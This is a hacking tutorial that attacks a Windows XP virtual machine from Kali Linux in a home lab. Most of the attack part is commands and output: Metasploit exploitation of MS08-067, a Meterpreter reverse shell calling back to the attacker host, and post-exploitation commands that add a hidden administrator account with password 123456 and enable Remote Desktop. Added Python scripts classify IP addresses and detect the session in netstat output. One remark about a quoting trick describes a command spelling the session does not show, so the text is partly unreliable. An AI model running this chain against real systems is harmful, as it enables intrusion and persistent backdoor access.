Since I am a peace-loving person (laughing behind my hand), I got into hacking by building two systems in a virtual machine, one Kali Linux and one Windows XP, and using them for a hacking experiment.


#### Test tools

Kali Linux (Baidu Encyclopedia) comes with many penetration-testing tools pre-installed, including Nmap, Wireshark, John the Ripper, and Aircrack-ng.[2] Users can run Kali Linux from a hard disk, a live CD, or a live USB. Metasploit is a free, downloadable framework that makes it easy to acquire, develop, and run exploits against software vulnerabilities. It ships with professional-grade exploit modules for hundreds of known software vulnerabilities.


Bridged networking: connects the VM to the network through a network adapter on the host system.

NAT networking: in NAT mode the VM does not have its own IP address on the external network; a separate private network is set up on the host system and the host translates addresses for the VM.

Host-only networking: creates a network that is completely contained within the host; the VM can talk to the host and to other host-only VMs, but not to the outside network.

IP addresses (IPv4 in this case): address classes and network types.

An IP address consists of a net-id and a host-id. According to the number of bits in the network number, IP addresses are divided into classes A, B, C, D, and E; by first octet, class A is 0-127, class B is 128-191, and class C is 192-223.

3.0 Differences between the bridged, NAT, and host-only modes provided by VMware

The virtual machine network in this test uses bridged mode, so bridged mode is the one described here. In bridged mode the VMware guest operating system behaves like a standalone host on the local network and can reach any machine on that network. Because the guest is an independent host, it needs its own IP address and subnet mask. The relationship between a bridged guest and the host machine is like two computers plugged into the same hub: for them to communicate you must configure an IP address and subnet mask on the guest, otherwise they cannot talk to each other, and the guest must be on the same network segment as the host machine.
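As an added example (not code from the original post), here is a small Python script that splits an address into net-id and host-id using the classful ranges above and checks whether two addresses, such as the Kali and Windows XP guests, sit on the same segment for a given mask. It goes slightly beyond the text: it also covers classes D and E, and it takes an explicit subnet mask, because real networks use CIDR masks rather than the classful defaults. The addresses and mask are the ones used in this test (192.168.201.133, 192.168.201.135, 255.255.255.0); the function names are my own.

```python
import ipaddress

# Classful IPv4 ranges by first octet, as in the text (A: 0-127, B: 128-191,
# C: 192-223). D and E are added here for completeness; they have no host part.
CLASSES = [
    ("A", 0, 127, 8),
    ("B", 128, 191, 16),
    ("C", 192, 223, 24),
    ("D", 224, 239, None),   # multicast
    ("E", 240, 255, None),   # reserved
]


def ip_class(addr: str):
    """Return (class letter, default net-id bits) for a dotted-quad IPv4 address."""
    first_octet = int(ipaddress.IPv4Address(addr)) >> 24
    for letter, lo, hi, net_bits in CLASSES:
        if lo <= first_octet <= hi:
            return letter, net_bits
    raise ValueError(f"not a classifiable IPv4 address: {addr}")


def split_classful(addr: str):
    """Split addr into (net-id as a network address, host-id as an int)
    using the default mask of its class."""
    letter, net_bits = ip_class(addr)
    if net_bits is None:
        raise ValueError(f"class {letter} address {addr} has no host part")
    net = ipaddress.IPv4Network(f"{addr}/{net_bits}", strict=False)
    host_id = int(ipaddress.IPv4Address(addr)) & int(net.hostmask)
    return str(net.network_address), host_id


def same_segment(a: str, b: str, netmask: str) -> bool:
    """True if a and b fall in the same subnet for the given netmask.

    This is the condition a bridged guest must satisfy to talk to the host
    without a router: same net-id under the mask actually configured, which
    on modern networks is a CIDR mask rather than the classful default.
    """
    net_a = ipaddress.IPv4Network(f"{a}/{netmask}", strict=False)
    return ipaddress.IPv4Address(b) in net_a


if __name__ == "__main__":
    kali, winxp, mask = "192.168.201.133", "192.168.201.135", "255.255.255.0"
    print(ip_class(kali))                          # ('C', 24)
    print(split_classful(kali))                    # ('192.168.201.0', 133)
    print(same_segment(kali, winxp, mask))         # True
    print(same_segment(kali, "192.168.202.5", mask))  # False
```

The last call shows the failure case from the paragraph: an address one octet off, 192.168.202.5, would be on a different segment under a /24 mask and could not reach the host even though both are "class C" addresses.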



**1.0 Run the ifconfig command to view the network configuration**

```
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 52  bytes 3756 (3.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 52  bytes 3756 (3.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```

> **Here you can see that my IP address is 192.168.201.133. To change the IP address, run `ifconfig eth0 192.168.201.136`.**
>
> **127.0.0.1 is the [loopback address](https://baike.baidu.com/item/%E5%9B%9E%E9%80%81%E5%9C%B0%E5%9D%80): it refers to the local machine and is commonly used for testing. The loopback range 127.x.x.x is an internal address of the [host](https://baike.baidu.com/item/%E4%B8%BB%E6%9C%BA)'s IP [stack](https://baike.baidu.com/item/%E5%A0%86%E6%A0%88). It is used mainly for software testing and for local [inter-process communication](https://baike.baidu.com/item/%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1) over the network: whatever the program, once it sends data to a loopback address the protocol software returns it immediately without any network transmission.**

**2.0 Use the ping command to test whether Linux and Windows can communicate**

```
root@kali:~# ping -c 2 192.168.201.135
PING 192.168.201.135 (192.168.201.135) 56(84) bytes of data.
64 bytes from 192.168.201.135: icmp_seq=1 ttl=128 time=13.5 ms
64 bytes from 192.168.201.135: icmp_seq=2 ttl=128 time=0.395 ms

--- 192.168.201.135 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 0.395/6.986/13.578/6.592 ms
```

**Linux ping differs from Windows ping: if you do not set a count with `-c`, it keeps pinging until you interrupt it with Ctrl+C. Running `ping` without arguments prints the usage:**

```
root@kali:~# ping
Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface]
            [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
            [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
            [-w deadline] [-W timeout] [hop1 …] destination
```

**3.0 Start the PostgreSQL database service (Metasploit uses it as its database backend)**

```
root@kali:~# service postgresql start
```

**4.0 Run the msfconsole command in the terminal**

```
root@kali:~# msfconsole
cowsay++
 ______________
< metasploit >
 --------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.16.6-dev                          ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
```

> **Run the help command to view the available commands and their usage**

```
msf > help

Core Commands

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    irb           Drop into irb scripting mode
    load          Load a framework plugin
    quit          Exit the console
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers

Module Commands

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    edit          Edit the current module with the preferred editor
    info          Displays information about one or more modules
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Selects a module by name

Job Commands

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job

Resource Script Commands

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file

Database Backend Commands

    Command           Description
    -------           -----------
    db_connect        Connect to an existing database
    db_disconnect     Disconnect from the current database instance
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache
    db_status         Show the current database status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

Credentials Backend Commands

    Command       Description
    -------       -----------
    creds         List all credentials in the database
```
**5.0 Run search netapi to list all netapi-related exploit modules in the Metasploit framework**

```
msf > search netapi

Matching Modules

   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   exploit/windows/smb/ms03_049_netapi  2003-11-11       good    MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
   exploit/windows/smb/ms06_040_netapi  2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/windows/smb/ms06_070_wkssvc  2006-11-14       manual  MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great   MS08-067 Microsoft Server Service Relative Path Stack Corruption
```

> **You can see that the last module is ranked great, so ms08_067_netapi is the preferred choice. `show targets` lists the target platforms the exploit supports; `show options` lists the parameters the exploit needs to have set; `show payloads` lists the payloads that can be used with it.**

**6.0 Run use exploit/windows/smb/ms08_067_netapi and set the parameters**

```
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.201.135
rhost => 192.168.201.135
msf exploit(ms08_067_netapi) > check
[+] 192.168.201.135:445 The target is vulnerable.
msf exploit(ms08_067_netapi) > set lhost 192.168.201.133
lhost => 192.168.201.133
msf exploit(ms08_067_netapi) > set target 34
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.201.133:1
[*] 192.168.201.135:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 192.168.201.135
[*] Meterpreter session 1 opened (192.168.201.133:1 -> ...) at 2017-10-27 23:03:20 +0800
```

> **`set rhost`: set the target host IP address. `set lhost`: set the local (attacker) IP address that the reverse payload connects back to. `set target`: pick the target index from `show targets` that matches the victim's OS version, service pack and language; MS08-067 is a stack corruption, and a wrong target can crash the Server service instead of returning a session. `set payload`: choose the payload; `reverse_tcp_allports` makes the target try connecting back on every port starting from 1, which is why the handler above listens on port 1.**

**7.0 Enter shell to get a command shell on the controlled host. This is the Windows command prompt (DOS).**

```
meterpreter > shell
Process 1968 created.
Channel 1 created.
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user ZTG 123456 /add
(output garbled by the Chinese code page; it referenced NET HELPMSG 2224)

C:\WINDOWS\system32>net localgroup administrators ZTG /add
(output garbled by the code page)

C:\WINDOWS\system32>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
(output garbled by the code page)
```

The shell echoes each command back once, and the Windows messages come out as mojibake because the XP system uses a Chinese code page that the meterpreter channel does not translate. The first command's reference to NET HELPMSG 2224 is worth checking with `net helpmsg 2224` on the target; that message number means the account already exists, so the user may have been created on an earlier attempt.

```
C:\WINDOWS\system32>netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.201.135:139    0.0.0.0:0              LISTENING
  TCP    192.168.201.135:1031   192.168.201.133:1      ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:4500           *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1025         *:*
  UDP    127.0.0.1:1900         *:*
  UDP    192.168.201.135:123    *:*
  UDP    192.168.201.135:137    *:*
  UDP    192.168.201.135:138    *:*
  UDP    192.168.201.135:1900   *:*
```

Two lines here tell the story from the defender's side: 3389 is now LISTENING on all interfaces because of the REG ADD above, and the ESTABLISHED connection from 192.168.201.135:1031 to 192.168.201.133:1 is the Meterpreter session, an outbound connection from an ephemeral port to a port no legitimate service uses.
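To show what a responder would do with the output above, here is an added Python example (not part of the original post) that parses `netstat -an` text and flags the two artifacts of this attack: a Remote Desktop listener on all interfaces, and an ESTABLISHED connection from an ephemeral local port to an unexpected remote port, which is how a `reverse_tcp_allports` session looks from the victim. The sample text is a constructed copy of the target's output above, and the allow-list of expected remote ports is my assumption for the example, not something the post specifies.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample: a copy of the XP target's `netstat -an` output shown above.
# The Kali attacker is 192.168.201.133, the XP target is 192.168.201.135.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.201.135:139    0.0.0.0:0              LISTENING
  TCP    192.168.201.135:1031   192.168.201.133:1      ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    192.168.201.135:137    *:*
"""

# One netstat -an row; the State column is absent for UDP rows.
ROW_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)(?:\s+([A-Z_]+))?\s*$"
)

# Remote ports an XP desktop is expected to talk to. Assumed for this example;
# a real allow-list comes from the environment's baseline.
EXPECTED_REMOTE_PORTS = {21, 22, 25, 53, 80, 110, 135, 139, 143, 443, 445, 3389}


def parse_netstat(text: str) -> List[Dict]:
    """Turn netstat -an output into a list of row dicts; '*' ports become None."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # headers, blank lines, and anything unparsable
        proto, laddr, lport, faddr, fport, state = m.groups()
        rows.append({
            "proto": proto,
            "laddr": laddr, "lport": None if lport == "*" else int(lport),
            "faddr": faddr, "fport": None if fport == "*" else int(fport),
            "state": state or "",
        })
    return rows


def listening_tcp_ports(rows: List[Dict]) -> Set[int]:
    """All TCP ports in LISTENING state."""
    return {r["lport"] for r in rows
            if r["proto"] == "TCP" and r["state"] == "LISTENING"}


def rdp_exposed(rows: List[Dict]) -> bool:
    """True when Terminal Services listens on 3389 on all interfaces (0.0.0.0)."""
    return any(r["proto"] == "TCP" and r["state"] == "LISTENING"
               and r["lport"] == 3389 and r["laddr"] == "0.0.0.0"
               for r in rows)


def suspicious_outbound(rows: List[Dict]) -> List[Tuple[str, int, str, int]]:
    """ESTABLISHED TCP connections from an ephemeral local port (>= 1024)
    to a remote port outside the allow-list.

    A reverse_tcp_allports Meterpreter session shows up here because the
    target connects *out* to the attacker on an arbitrary port (port 1 above).
    """
    hits = []
    for r in rows:
        if r["proto"] != "TCP" or r["state"] != "ESTABLISHED":
            continue
        if r["lport"] is not None and r["lport"] >= 1024 \
                and r["fport"] not in EXPECTED_REMOTE_PORTS:
            hits.append((r["laddr"], r["lport"], r["faddr"], r["fport"]))
    return hits


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print(sorted(listening_tcp_ports(rows)))   # [135, 139, 445, 1026, 3389]
    print(rdp_exposed(rows))                   # True
    print(suspicious_outbound(rows))           # [('192.168.201.135', 1031, '192.168.201.133', 1)]
```

The port allow-list is deliberately the weak point of this heuristic: a payload configured to call back on 443 would pass it, so in practice the check is paired with process ownership (`netstat -ano` on XP gives the PID) and with the fact that a Server service host process should never own an outbound connection at all.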

```
C:\WINDOWS\system32>ipconfig -all

Windows IP Configuration

        Host Name . . . . . . . . . . . . : dflx
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter (name garbled by the code page):

        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-0C-29-04-23-53
        Dhcp Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 192.168.201.135
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . :
```
> **Getting to the Windows desktop: the command prompt is enough to work with, but if you prefer the Windows GUI you can run the commands below and then operate the machine through Remote Desktop.**

```
C:\WINDOWS\system32>net user ztg 123456 /add
```

Add a user named ztg with the password 123456.

```
C:\WINDOWS\system32>net localgroup administrators ztg /add
```

Add ztg to the Administrators group.

```
C:\WINDOWS\system32>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```

Set fDenyTSConnections to 0 to manually enable Remote Desktop (TCP port 3389). The `Terminal" "Server` spelling used in the session above is a cmd.exe quoting trick that produces the same key path as quoting the whole path. If Windows Firewall is enabled on the target, 3389 must also be allowed through it; the `netstat -an` output above only confirms that the service is listening, not that the port is reachable from Kali.